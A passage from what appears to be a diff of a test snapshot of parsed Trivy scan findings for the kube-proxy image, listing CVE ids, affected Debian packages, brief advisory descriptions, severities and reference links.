}, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://bugzilla.redhat.com/2155515", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "libapt-pkg5.0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.0.6-9.2~deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3112-1", - "installedVersion": "1.0.6-9.2~deb10u1", - "packageName": "libbz2-1.0", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "bzip2 - bugfix update", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "4.16.0-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5707-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.3.1-1+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46828", + "installedVersion": "1.3.1-1", + "packageName": "libtirpc-common", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "https://access.redhat.com/errata/RHSA-2022:8400", + "https://access.redhat.com/security/cve/CVE-2021-46828", + "https://bugzilla.redhat.com/2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "https://errata.rockylinux.org/RLSA-2022:8400", + "https://linux.oracle.com/cve/CVE-2021-46828.html", + "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "https://security.gentoo.org/glsa/202210-33", + "https://security.netapp.com/advisory/ntap-20221007-0004/", + "https://ubuntu.com/security/notices/USN-5538-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "https://www.debian.org/security/2022/dsa-5200", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", + "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", + "name": "libtirpc: DoS vulnerability with lots of connections", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://avd.aquasec.com/nvd/cve-2021-46828", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://access.redhat.com/errata/RHSA-2022:8400", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-46828", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://bugzilla.redhat.com/2109352", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", }, { "type": "URL", - "value": 